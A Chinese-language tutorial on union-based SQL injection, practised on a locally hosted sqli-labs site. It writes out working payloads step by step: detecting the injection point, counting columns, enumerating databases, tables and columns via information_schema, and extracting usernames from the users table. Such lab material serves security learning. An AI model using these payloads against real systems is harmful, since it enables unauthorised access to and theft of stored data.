SQL注入-union注入

​

三级标题

（union注入条件：union用于合并多个select语句的结果，所有他呀求内部的select语句要拥有相同数量的列，列也要是相似的数据类型）
id=1’如果报错，那么就存在注入点，可以在使用id=1' and 1=1#和id=1' and 1=2#判断，如果注入存在，那么id=1’ and 1=2#会报错（有闭合说明是字符型，数字型就没得闭合了，并且输入数据错误，比如id=1-，如果后面没有闭合符，sql会自动矫正）id=1’ and 1=1–+执行。
使用浏览器访问本地搭建的sqlilabs

id=1' and 1=1--+执行

id=1' and 1=2--+报错

判断存在注入后，开始判断有多少表，使用order by判断（也可以使用group by，方法是一样的）使用id=1' order by 10--+，他告诉我们没有那么多，我们可以试试折半去找

使用id=1' order by 5--+

试试3，使用id=1' order by 3--+

判断完有几个表，那我们就要看看这个字段的显示位置在哪了，我们可以给id一个不存在的值，比如-1、a、9999999等

这里采用union注入 id=-1'union select 1,2,3--+,1，2，3为刚才探测到的字段 ，可以看到字段二在login name后，字段3在password后

然后就可以查看他都有什么数据库了id=-1'union select 1,2,group_concat(schema_name) from information_schema.schemata--+

翻译一下group_concat(schema_name) from information_schema.schemata–+
group_concat()：是将查询到的结果合并，结果和结果之间用逗号隔开 。
information_schema：是mysql自带的一个信息数据库包含了mysql维护的其他数据库的信息
schemata：是information_schema库下的一个表，存放了当前数据库下的所有数据库，效果等同于showdatabase
schema_name：schemata表中的列，包含了当前数据库管理系统中所有的数据库名
直译过来大概就是打印information_schema库中schemata表schema_name列
information_schema数据库只存在于MySQL5.0之后，5.0之前只能使用access字典暴力破解的方式
在information_schema数据库中还可以利用的表： schema_name　 　储存了所有数据库的库名
table_schema　 储存了数据库名 tables　 储存了数据库库名，以及该库中包含的表名，
table_schema 储存了数据库名 table_name　　 储存了表名
具体可参考：https://learn.microsoft.com/zh-cn/azure/databricks/sql/language-manual/information-schema/schemata
https://blog.csdn.net/kikajack/article/details/80065753

我们还可以在这查询数据库的一些信息，比如查询我们当前的数据库以及版本信息id=-1' union select 1,database(),version()--+，我们可以看到当前的数据库是security，mysql版本为5.7.26

version()：查看数据库版本
database()：查看使用的数据库
user()：查看当前用户
limit：limit子句分批来获取所有数据
group_concat()：一次性获取所有的数据库信息

我们知道了数据库，然后开始查看表名id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

翻译一下id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+，大部分语句在前面已经翻译过，从information_schema数据库中的tables表中执行database()

然后我们要获取表中的所有的字段，这边选择获取users表中的字段，因为users表中存储的是用户数据id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users') --+

最后，获取字段中的所有数据id=0' union select 1,2,(select group_concat(username) from security.users) --+